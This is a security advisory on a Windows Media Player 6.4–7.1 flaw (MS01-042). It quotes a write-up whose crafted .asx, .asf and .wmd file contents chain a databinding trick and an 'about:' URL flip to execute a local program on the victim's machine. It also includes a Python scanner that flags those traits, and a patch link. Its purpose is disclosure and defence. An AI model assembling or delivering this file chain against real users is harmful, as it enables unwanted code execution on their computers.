COMMAND

    Media Player

SYSTEMS AFFECTED

    Windows Media Player 6.4, 7, and 7.1

PROBLEM

    The following is based on Microsoft Security Bulletin MS01-042.
    Windows Media Player provides support for audio and video
    streaming.  Streaming media channels can be configured by using
    Windows Media Station (.NSC) files.  An unchecked buffer exists
    in the functionality used to process Windows Media Station files.
    This unchecked buffer could  potentially allow an attacker  to run
    code of his choice on the  machine of another user.  The  attacker
    could either send a specially  malformed file to another user  and
    entice her to run or preview it,  or he could host such a file  on
    a web site  and cause it  to launch automatically  whenever a user
    visited the site.  The code  could take any action on the  machine
    that the legitimate user himself could take.

    Customers  who  have  applied  the  Outlook E-mail Security Update
    (OESU) for Outlook 2000 or  are running Outlook XP, which  has the
    OESU functionality built-in,  are automatically protected  against
    HTML e-mail based attempts to exploit this vulnerability.

    For others not in the above categories, the attacker would have to
    entice the potential victim to visit a web site he controlled,  or
    to open an HTML e-mail he had sent.

    The attacker would need to know the specific operating system that
    the user was running in order to tailor the attack code  properly;
    if the attacker made an incorrect guess about the user's operating
    system platform, the attack  would crash the user's  Windows Media
    Player session, but not run code of the attacker's choice.

    Windows Media Player can be made to execute files on the target
    computer as follows.

    1. Create an *.asx meta file as follows:

        <ASX><Entry><ref HREF=''/></ASX>
        <IFRAME SRC='about:<body><html><OBJECT CLASSID="CLSID:10000000-0000-0000-0000-000000000000" CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME>
        <!-- 27.07.01 http://www.malware.com -->

    2. Create an *.asf file with URL flip as follows:

        about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0
        CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="file://C:\My Documents\My Music\Virtual Albums\malware\malware.asx"><PARAM NAME="UseHeader" VALUE="true"></OBJECT><div datasrc=#Content datafld="<ASX><Entry><ref HREF=''/></ASX>" dataformatas="HTML" style="width: 100%; height: 60%;"></div>

    3. Create a *.wmd file comprising 1 and 2 above.

    What happens?  Ordinarily the Windows Media Download Package file
    (*.wmd) creates a folder with the name of the *.wmd file, e.g.
    malware.wmd will create a folder called malware in the default
    location for so-called "Virtual Music", specifically
    My Documents\My Music\Virtual Albums\malware.  Security measures
    currently incorporated in the extraction of the contents of the
    *.wmd do a reasonably good job of ensuring that files contained
    within the Download Package are in fact valid files.

    A reasonably good job.

    We find that the bare minimum for the *.asx meta file must include
    the following:

        <ASX><Entry><ref HREF=''/></ASX>

    with these  tags the  Media Player  will indeed  extract the *.asx
    file into our known folder.  So how do we make use of that?

    Databinding.

    We  find  that  we  can  parse  html using the databinding control
    included in IE5.  And we  do it like so:  the  databinding control
    requires a header to match what it  is to write as html.  What  we
    do, quite  brilliantly actually,  is use  the *.asx  header as our
    header for the databinding control:

        *.asx - <ASX><Entry><ref HREF=''/></ASX>

    databinding control:

        datafld="<ASX><Entry><ref HREF=''/></ASX>"

    The Windows Media Package file (malware.wmd) is automatically
    opened from web, news or mail, and it automatically creates the
    malware folder in the so-called "Virtual Music" directory.  It
    automatically extracts the malware.asx meta file, which is valid
    but includes our ActiveX component as above, and it extracts our
    malware.asf file, which includes our URL flip.  The URL flip is
    called once malware.asf starts playing; it creates an "about"
    window from within the malware folder, and the "about" window
    includes our databinding control, which points to the malware.asx
    that is rendered as *.html because the datafld header *IS* the
    *.asx meta tag!

    And all that in turn executes our file on the target computer!

    1. The machine that this is all on is now dead thanks to your
       module MSDXM.OCX, which will require a reformat.  Nevertheless
       a fully functional example has been thoroughly tested in "the
       field".
    2. The "free" Advanced Script Indexer that comes with the  Windows
       Media  7  Resource  Kit  allows  us  to include in the URL flip
       whatever we like.
    3. The  path  to  the  so-called  "Virtual  Music"  directory   is
       hard-coded in the above.  The possibility of not having to know
       the location is good  because everything is opened  from within
       the same folder created  by the Windows Media  Download package
       i.e.  possibly  through a "skin"  file, or some  other entry in
       the *.asx such as  an <event> parameter coupled  with scripting
       in the *.asf or *.wmz file(s), relative paths should work.
    4. When it suits us,  we'll recompile the working example  if none
       of the above is clear.
    5. It took 10 days to conceive, craft and construct, of which
       about 5 days were spent crashing and scandisk-ing at minimum
       4 times per day.  Win98.  Very unstable.
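    A defender-side check, added here and not part of the bulletin or
    the malware.com writeup: it unpacks a Windows Media Download
    Package in memory and flags .asx/.asf members showing the traits
    described above (markup trailing the minimal ASX header,
    OBJECT/IFRAME tags, a datafld header that is itself an ASX tag,
    an "about:" URL flip).  It assumes a *.wmd is a ZIP archive; the
    heuristics and the sample packages are constructed for this example.

```python
# Added example (not from the bulletin). Assumes a .wmd package is a ZIP
# archive; the heuristics below are my own, keyed to the writeup above.
import io
import re
import zipfile

TRAILING_MARKUP = re.compile(r"</ASX>\s*<", re.IGNORECASE)      # markup after the minimal ASX header
ACTIVE_CONTENT = re.compile(r"<(IFRAME|OBJECT)\b|CLASSID=|CODEBASE=", re.IGNORECASE)
DATAFLD_ASX = re.compile(r'datafld\s*=\s*"?\s*<ASX', re.IGNORECASE)  # databinding header is an ASX tag
ABOUT_URL = re.compile(r"\babout:\s*<", re.IGNORECASE)          # "about:" URL flip with inline markup

def findings_for(name, text):
    """Return (member name, reason) tuples for one package member."""
    hits = []
    lower = name.lower()
    if lower.endswith(".asx") and TRAILING_MARKUP.search(text):
        hits.append((name, "markup follows closing </ASX> tag"))
    if ACTIVE_CONTENT.search(text):
        hits.append((name, "IFRAME/OBJECT or CLASSID/CODEBASE in media metadata"))
    if DATAFLD_ASX.search(text):
        hits.append((name, "datafld header is an ASX tag (databinding trick)"))
    if lower.endswith(".asf") and ABOUT_URL.search(text):
        hits.append((name, "about: URL flip carrying inline markup"))
    return hits

def scan_wmd(data):
    """Scan the .asx/.asf members of a .wmd (ZIP) archive held in memory."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith((".asx", ".asf")):
                text = zf.read(info).decode("latin-1", errors="replace")
                hits.extend(findings_for(info.filename, text))
    return hits

def build_sample_wmd(members):
    """Build an in-memory .wmd from {name: text}; used for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in members.items():
            zf.writestr(name, text)
    return buf.getvalue()

# Constructed samples: a benign playlist and one shaped like the writeup above.
BENIGN = {"album.asx": "<ASX><Entry><ref HREF='track1.wma'/></Entry></ASX>"}
SUSPECT = {
    "malware.asx": "<ASX><Entry><ref HREF=''/></ASX>\n<IFRAME SRC='about:<OBJECT "
                   "CLASSID=\"CLSID:00000000-0000-0000-0000-000000000000\"></OBJECT>'></IFRAME>",
    "malware.asf": "about:<OBJECT ID=\"Content\"></OBJECT><div datasrc=#Content "
                   "datafld=\"<ASX><Entry><ref HREF=''/></ASX>\"></div>",
}
```

    Calling scan_wmd(build_sample_wmd(SUSPECT)) returns five findings
    across the two members, while the benign package returns none.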

SOLUTION

    A patch is available to  fix this vulnerability.  Please  read the
    Security Bulletin:

        http://www.microsoft.com/technet/security/bulletin/ms01-042.asp

    for information on obtaining this patch.